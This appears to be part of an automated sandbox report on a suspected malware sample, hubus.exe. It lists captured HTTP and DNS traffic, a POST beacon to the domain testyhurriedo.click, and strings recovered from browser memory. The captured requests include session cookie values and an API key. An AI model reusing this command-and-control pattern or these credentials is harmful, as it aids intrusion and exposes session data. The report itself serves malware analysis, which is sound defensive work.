                          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26oft%3D1%26pgcl%3D20%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgRmgZjNGKXmkrsGIjAb7Fn47Pfqq66K6PhdOlnUxTi9zJAMw9w-80fWZCRZxaXkInduKUM2DaaOHZpbOAUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGKXmkrsGIjBi_vnjRSamj0Ps8W_DTyzCERXw8ffcqRqOodjIwUl9-vkLiJC2hrtFdECb_cWTDBsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKXmkrsGIjCkGpzj8-euKlDOVcJu_WqTG7Pj74bgPdYXXG0950A2yNMi702qgLvpvTQOXXmXdkwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000003.12119374185.00002D2402418000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119276808.00002D24036CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
                          Source: chrome.exe, 00000002.00000003.12119374185.00002D2402418000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119276808.00002D24036CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197201532.00002D24033CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: testyhurriedo.click
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: klipcatepiu0.shop
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: testyhurriedo.click
                          Source: global trafficTCP traffic: 192.168.11.20:55773 -> 239.255.255.250:1900
                          Source: global trafficTCP traffic: 192.168.11.20:55773 -> 239.255.255.250:1900
                          Source: global trafficTCP traffic: 192.168.11.20:55773 -> 239.255.255.250:1900
                          Source: global trafficTCP traffic: 192.168.11.20:55773 -> 239.255.255.250:1900
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096371
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096608
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096838
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644627
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644912
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/41488637
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261924
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263580
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264193
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264287
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264571
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265509
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266194
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266231
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266232
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266842
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/941620
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microx
                          Source: chrome.exe, 00000002.00000002.12186986657.00002D24022DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
                          Source: chrome.exe, 00000002.00000002.12186475572.00002D2402279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                          Source: chrome.exe, 00000002.00000002.12186475572.00002D2402279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/c
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                          Source: chrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                          Source: chrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                          Source: chrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                          Source: chrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                          Source: chrome.exe, 00000002.00000002.12195116163.00002D2403038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                          Source: hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                          Source: chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                          Source: chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                          Source: chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116608328.00002D2402C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;dc_pre=CL6sqZyWpIgDFWU-RAgdUQci9A;src=2542116;type=cli
                          Source: chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193644536.00002D2402D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000002.12186392208.00002D2402230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                          Source: chrome.exe, 00000002.00000002.12199795064.00002D240391C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12190418549.00002D2402920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                          Source: chrome.exe, 00000002.00000002.12199795064.00002D240391C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
                          Source: chrome.exe, 00000002.00000002.12190418549.00002D2402920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adscale.de
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setup
                          Source: chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alldrivers4devices.net/
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265720
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aqfer.com
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beastacademy.com/checkout/cart
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
